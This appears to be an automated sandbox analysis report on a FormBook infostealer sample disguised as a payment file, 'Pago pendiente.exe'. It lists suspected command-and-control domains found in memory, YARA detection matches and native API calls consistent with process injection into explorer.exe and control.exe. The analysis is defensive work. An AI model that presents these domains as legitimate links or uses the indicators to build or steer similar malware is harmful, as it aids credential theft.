          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternalknot1008.com/gs12/www.zgcple.info
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternalknot1008.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/gs12/www.airzf.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyzReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.k2securityhn.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.k2securityhn.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.k2securityhn.com/gs12/www.wonderdread.cloud
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.k2securityhn.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.com/gs12/www.y2llvq.vip
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lolabeautystudios.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.signomo.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.signomo.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.signomo.com/gs12/www.urxetqt.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.signomo.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sports565.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sports565.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sports565.com/gs12/www.lolabeautystudios.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sports565.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tronbank.club
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tronbank.club/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tronbank.club/gs12/www.signomo.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tronbank.clubReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.us/gs12/www.eternalknot1008.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.udin88b.usReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.umastyle.club
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.umastyle.club/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.umastyle.club/gs12/www.sports565.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.umastyle.clubReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urxetqt.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urxetqt.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urxetqt.com/gs12/www.hjgd.xyz
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urxetqt.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wonderdread.cloud
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wonderdread.cloud/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wonderdread.cloud/gs12/www.umastyle.club
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wonderdread.cloudReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y2llvq.vip
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y2llvq.vip/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y2llvq.vip/gs12/www.51win.ink
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y2llvq.vipReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zgcple.info
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zgcple.info/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zgcple.info/gs12/www.k2securityhn.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zgcple.infoReferer:
          Source: explorer.exe, 00000006.00000000.2029302609.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000006.00000000.2020705290.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.4445926904.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2020705290.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000002.4444586531.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3095397354.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2016481468.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000006.00000003.3097001927.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4449891914.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097220261.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096490276.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000002.4449957042.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096490276.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2029302609.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000006.00000000.2026275554.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000006.00000000.2026275554.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: explorer.exe, 00000006.00000002.4459657953.000000001136F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.00000000051EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4458911697.000000000E4E6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: Process Memory Space: Pago pendiente.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 1644, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          .NET source code contains very large array initializations
          Source: Pago pendiente.exe, Program.csLarge array initialization: : array initializer size 566442
          Source: 0.2.Pago pendiente.exe.7700000.11.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
          Source: 0.2.Pago pendiente.exe.32f8498.5.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041A360 NtCreateFile,5_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041A410 NtReadFile,5_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041A490 NtClose,5_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,5_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041A35A NtCreateFile,5_2_0041A35A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041A53B NtAllocateVirtualMemory,5_2_0041A53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472B60 NtClose,LdrInitializeThunk,5_2_01472B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01472BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472AD0 NtReadFile,LdrInitializeThunk,5_2_01472AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472D10 NtMapViewOfSection,LdrInitializeThunk,5_2_01472D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_01472D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472DD0 NtDelayExecution,LdrInitializeThunk,5_2_01472DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01472DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01472C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_01472CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472F30 NtCreateSection,LdrInitializeThunk,5_2_01472F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472FE0 NtCreateFile,LdrInitializeThunk,5_2_01472FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01472F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472FB0 NtResumeThread,LdrInitializeThunk,5_2_01472FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_01472E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01472EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01474340 NtSetContextThread,5_2_01474340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01474650 NtSuspendThread,5_2_01474650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472BE0 NtQueryValueKey,5_2_01472BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472B80 NtQueryInformationFile,5_2_01472B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472BA0 NtEnumerateValueKey,5_2_01472BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472AF0 NtWriteFile,5_2_01472AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472AB0 NtWaitForSingleObject,5_2_01472AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472D00 NtSetInformationFile,5_2_01472D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472DB0 NtEnumerateKey,5_2_01472DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472C60 NtCreateKey,5_2_01472C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472C00 NtQueryInformationProcess,5_2_01472C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472CC0 NtQueryVirtualMemory,5_2_01472CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472CF0 NtOpenProcess,5_2_01472CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472F60 NtCreateProcessEx,5_2_01472F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472FA0 NtQuerySection,5_2_01472FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472E30 NtWriteVirtualMemory,5_2_01472E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472EE0 NtQueueApcThread,5_2_01472EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01473010 NtOpenDirectoryObject,5_2_01473010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01473090 NtSetValueKey,5_2_01473090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014735C0 NtCreateMutant,5_2_014735C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014739B0 NtGetContextThread,5_2_014739B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01473D70 NtOpenThread,5_2_01473D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01473D10 NtOpenProcessToken,5_2_01473D10
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CFE12 NtProtectVirtualMemory,6_2_0E4CFE12
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CE232 NtCreateFile,6_2_0E4CE232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CFE0A NtProtectVirtualMemory,6_2_0E4CFE0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04822CA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822C60 NtCreateKey,LdrInitializeThunk,7_2_04822C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04822C70
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822DD0 NtDelayExecution,LdrInitializeThunk,7_2_04822DD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04822DF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04822D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04822EA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822FE0 NtCreateFile,LdrInitializeThunk,7_2_04822FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822F30 NtCreateSection,LdrInitializeThunk,7_2_04822F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822AD0 NtReadFile,LdrInitializeThunk,7_2_04822AD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04822BE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04822BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822B60 NtClose,LdrInitializeThunk,7_2_04822B60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048235C0 NtCreateMutant,LdrInitializeThunk,7_2_048235C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04824650 NtSuspendThread,7_2_04824650
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04824340 NtSetContextThread,7_2_04824340
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822CC0 NtQueryVirtualMemory,7_2_04822CC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822CF0 NtOpenProcess,7_2_04822CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822C00 NtQueryInformationProcess,7_2_04822C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822DB0 NtEnumerateKey,7_2_04822DB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822D00 NtSetInformationFile,7_2_04822D00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822D30 NtUnmapViewOfSection,7_2_04822D30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822E80 NtReadVirtualMemory,7_2_04822E80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822EE0 NtQueueApcThread,7_2_04822EE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822E30 NtWriteVirtualMemory,7_2_04822E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822F90 NtProtectVirtualMemory,7_2_04822F90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822FA0 NtQuerySection,7_2_04822FA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822FB0 NtResumeThread,7_2_04822FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822F60 NtCreateProcessEx,7_2_04822F60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04822AB0 NtWaitForSingleObject,7_2_04822AB0
